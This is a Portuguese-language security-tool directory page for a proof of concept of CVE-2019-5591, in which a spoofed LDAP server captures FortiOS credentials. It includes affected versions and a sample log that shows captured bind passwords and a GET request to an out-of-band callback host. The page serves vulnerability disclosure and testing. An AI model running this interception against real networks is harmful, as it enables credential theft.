Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
fortios-ldap-mitm-poc-CVE-2019-5591 — A configuração padrão do LDAP no FortiOS v6.0.x a v6.2.0 não verifica a identidade do servidor para LDAP/S, levando a ataques MITM. Esta PoC demonstra a exfiltração completa de credenciais enviadas na sub-rede local para um servidor LDAP que é facilmente falsificado. | Kitploit
Ferramentas/GitHubGitHub/ayewo/fortios-ldap-mitm-poc-cve-2019-5591
Análise de VulnerabilidadesExploraçãoColeta de InformaçõesSegurança de RedeTestes de PenetraçãoAutenticação
GitHubayewo/fortios-ldap-mitm-poc-cve-2019-5591

fortios-ldap-mitm-poc-CVE-2019-5591

A configuração padrão do LDAP no FortiOS v6.0.x a v6.2.0 não verifica a identidade do servidor para LDAP/S, levando a ataques MITM. Esta PoC demonstra a exfiltração completa de credenciais enviadas na sub-rede local para um servidor LDAP que é facilmente falsificado.

Ver Repositório
12há 10 mesesAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

CVE-2019-5591

Esta Prova de Conceito (PoC) demonstra um ataque MITM (Homem-no-Meio): personificação de um servidor LDAP na sub-rede local de um dispositivo FortiGate executando uma versão vulnerável do FortiOS.

Versões Afetadas

Estas versões são vulneráveis:

VersãoAfetadaSolução
FortiOS 7.0Não afetadaNão aplicável
FortiOS 6.06.0.3 a 6.2.0Atualizar para 6.2.1 ou superior

Detecção em Ação

FortiOS 6.2.0 executando dentro do VMware Fusion foi usado para a PoC.

root@kitploit:~

[2025-10-16 22:59:47.366765] New connection from 192.168.43.24:54789

--- Request #1 ---
BIND Request:
  Message ID: 1
  DN: cn=admin,dc=example,dc=com
  Password: ldapAdMiNPassw0rd!
  -> Sent BIND Response (Success)

--- Request #2 ---
SEARCH Request:
  Message ID: 2
  Base DN: dc=example,dc=com
  Filter: 

cn
nLBkcjDTHC01.1...
  -> Sent SEARCH Result Entry
  -> Sent SEARCH Result Done

--- Request #3 ---
BIND Request:
  Message ID: 3
  DN: dc=example,dc=com
  Password: d3omljs2kel69tn1dun0m4mykgw1uafyz.oast.pro

🔑 CAPTURED PASSWORD: d3omljs2kel69tn1dun0m4mykgw1uafyz.oast.pro
🔧 No scheme found — prepending https:// -> https://d3omljs2kel69tn1dun0m4mykgw1uafyz.oast.pro
📡 Attempting GET request to: https://d3omljs2kel69tn1dun0m4mykgw1uafyz.oast.pro
✅ GET request successful! Status code: 200
  -> Sent BIND Response (Success)

--- Request #4 ---
SEARCH Request:
  Message ID: 4
  Base DN: dc=example,dc=com
  Filter: 


objectclass0memberOfprimaryG...
  -> Sent SEARCH Result Entry
  -> Sent SEARCH Result Done

--- Request #5 ---

[2025-10-16 22:59:49.159193] Connection closed from 192.168.43.24:54789

============================================================
SESSION SUMMARY - Captured Password: d3omljs2kel69tn1dun0m4mykgw1uafyz.oast.pro
============================================================

Descrição

A configuração padrão do LDAP no FortiOS v6.0.x a v6.2.0 não verifica a identidade do servidor para LDAP/S, levando a ataques MITM. Esta PoC demonstra a exfiltração completa de credenciais enviadas na sub-rede local para um servidor LDAP que é facilmente personificado.

Baixar ferramenta